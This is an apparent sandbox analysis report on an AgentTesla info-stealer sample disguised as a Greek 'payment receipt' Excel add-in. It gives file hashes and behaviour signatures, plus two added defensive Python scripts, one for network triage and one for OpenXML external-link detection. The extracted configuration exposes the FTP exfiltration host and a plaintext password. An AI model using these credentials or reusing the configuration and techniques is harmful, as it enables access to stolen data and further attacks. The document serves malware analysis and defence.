General

  • Target

    απόδειξη πληρωμής.xla

  • Size

    49KB

  • Sample

    240409-pe4f9aaa2t

  • MD5

    c8fe82a5c4bf0f70d6d1e53b62c3755a

  • SHA1

    cfe4dedf157b463cb18b697d8c3ca3a2c99b4776

  • SHA256

    5dd02f730b0078b018c8ec2fdf0791b3d547ebea3ce57f8d7d4ac53253e8dff8

  • SHA512

    3a9b99b40942fe3c8c9245fd7016ee060091297f2d8865a57a3e647f9fefde810ade71242cccc2d36c4cdee1a2a67d838a1e6e8c398162dc64e614e18db2459f

  • SSDEEP

    768:N1yBP0tNFCybZey9F6434PeiV0JfmcCip781qAnC7Tn6i:N168tu6v3YcCkcqiC7Tnh

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.fosna.net
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    }7A;Adw^&~wE
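The extracted configuration gives the two network behaviours a defender can pivot on: the implant contacts an external-IP lookup service, then pushes stolen data to the FTP C2 above. The following is an added example (not part of the sandbox report) that correlates those two steps over constructed Zeek-style connection records; the log lines and the list of IP lookup hosts are assumptions, since the report names neither. The credentials themselves are deliberately not used: they are indicators, not something to log in with.

```python
"""Network-side triage for the extracted AgentTesla config: flag hosts that contact
the FTP C2, and raise severity when the same host queried an external-IP lookup
service shortly before (the two behaviours listed in this report)."""
from datetime import datetime, timedelta

# Indicators taken from the extracted configuration above
C2_HOST = "ftp.fosna.net"
C2_PORT = 21

# Assumption: the report does not name the lookup service; these are common ones.
IP_LOOKUP_HOSTS = {"api.ipify.org", "checkip.dyndns.org", "icanhazip.com"}

# Constructed sample log (not from the report): ts, src, dst_host, dst_port, service
SAMPLE_LOG = """\
2024-04-09T10:00:01Z\t10.0.0.5\tupdate.example.com\t443\tssl
2024-04-09T10:00:04Z\t10.0.0.5\tapi.ipify.org\t80\thttp
2024-04-09T10:00:09Z\t10.0.0.5\tftp.fosna.net\t21\tftp
2024-04-09T10:05:00Z\t10.0.0.7\tftp.fosna.net\t21\tftp
2024-04-09T11:00:00Z\t10.0.0.9\tapi.ipify.org\t80\thttp
"""


def parse_log(text):
    """Parse tab-separated records into dicts with a real datetime and int port."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port, service = line.split("\t")
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "src": src,
            "dst": dst.lower(),
            "port": int(port),
            "service": service,
        })
    return events


def triage(events, window=timedelta(minutes=10)):
    """Return {src_host: severity}.

    'high'   = external-IP lookup followed by C2 contact within `window`
    'medium' = C2 contact with no preceding lookup
    An IP lookup on its own is not reported: too many legitimate tools do it.
    """
    lookups = {}   # src -> timestamps of IP-lookup requests seen so far
    verdicts = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["dst"] in IP_LOOKUP_HOSTS:
            lookups.setdefault(ev["src"], []).append(ev["ts"])
        elif ev["dst"] == C2_HOST and ev["port"] == C2_PORT:
            recent = any(ev["ts"] - t <= window for t in lookups.get(ev["src"], []))
            severity = "high" if recent else "medium"
            # keep the worst verdict per source host
            if verdicts.get(ev["src"]) != "high":
                verdicts[ev["src"]] = severity
    return verdicts


if __name__ == "__main__":
    for host, severity in triage(parse_log(SAMPLE_LOG)).items():
        print(f"{host}: {severity}")
```

On the constructed log, 10.0.0.5 is rated high (lookup at 10:00:04, FTP to the C2 five seconds later), 10.0.0.7 is rated medium (C2 contact only), and 10.0.0.9 is not reported. In production the same logic runs over Zeek `conn.log`/`ftp.log` or proxy logs with DNS resolution applied first, since the C2 will usually appear as an IP rather than a hostname.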

Targets

    • Target

      απόδειξη πληρωμής.xla

    • AgentTesla

      Agent Tesla is an information-stealing remote access tool (RAT) written in .NET (Visual Basic .NET); it harvests credentials from browsers and mail clients and exfiltrates them over SMTP, FTP or HTTP, here FTP as shown in the extracted configuration.

    • Blocklisted process makes network request

    • Abuses the OpenXML format to download a file from an external location

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext (typical of process hollowing: a suspended process's thread is redirected to injected code before it resumes)
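The "abuses OpenXML format to download file from external location" signature refers to a relationship inside the package whose TargetMode is External, which Office resolves (and fetches) when the document is opened. The following is an added example, not code from the sandbox or from the report, of how to check a package for that: it builds a constructed minimal spreadsheet package containing one benign external hyperlink and one external oleObject reference (the URLs are placeholders), then lists every external relationship and flags those that are not plain hyperlinks. A legacy OLE2 .xla/.xls is not a ZIP and is rejected with an error rather than silently passed.

```python
"""Find OpenXML relationships that point outside the package (TargetMode="External").

Hyperlinks are also External relationships and are normal; anything else that
the application would fetch from outside the package is flagged as suspicious.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# External hyperlinks are expected in ordinary documents; other external targets are not.
BENIGN_EXTERNAL_TYPES = {"hyperlink"}


def make_sample_package() -> bytes:
    """Constructed minimal spreadsheet package (not the sample from the report).

    Contains a benign external hyperlink and an external oleObject relationship
    whose target URL is a placeholder.
    """
    sheet_rels = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}hyperlink"
    Target="https://example.com/" TargetMode="External"/>
  <Relationship Id="rId2" Type="{OFFICE_REL}oleObject"
    Target="http://example.invalid/update.xls" TargetMode="External"/>
</Relationships>"""
    workbook_rels = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{OFFICE_REL}worksheet" Target="worksheets/sheet1.xml"/>
</Relationships>"""
    sml = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("xl/workbook.xml", f'<?xml version="1.0"?><workbook xmlns="{sml}"/>')
        z.writestr("xl/_rels/workbook.xml.rels", workbook_rels)
        z.writestr("xl/worksheets/sheet1.xml", f'<?xml version="1.0"?><worksheet xmlns="{sml}"/>')
        z.writestr("xl/worksheets/_rels/sheet1.xml.rels", sheet_rels)
    return buf.getvalue()


def external_relationships(package: bytes):
    """Return one dict per External relationship found in any .rels part.

    Raises ValueError for input that is not a ZIP container (for example a
    legacy OLE2 .xls/.xla), which this check cannot inspect.
    """
    if not zipfile.is_zipfile(io.BytesIO(package)):
        raise ValueError("not an OpenXML (ZIP) package")
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append({
                    "part": name,
                    "type": rel_type,
                    "target": rel.get("Target", ""),
                    "suspicious": rel_type not in BENIGN_EXTERNAL_TYPES,
                })
    return findings


def suspicious_targets(package: bytes):
    """Just the URLs the application would fetch that are not ordinary hyperlinks."""
    return [f["target"] for f in external_relationships(package) if f["suspicious"]]


if __name__ == "__main__":
    for finding in external_relationships(make_sample_package()):
        print(finding)
```

Run against a real attachment, the flagged targets are the URLs to block and to search for in proxy logs; when a file carries a spreadsheet extension but is not a ZIP, treat it as a legacy binary workbook and hand it to an OLE2 parser instead.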

MITRE ATT&CK Enterprise v15

Tasks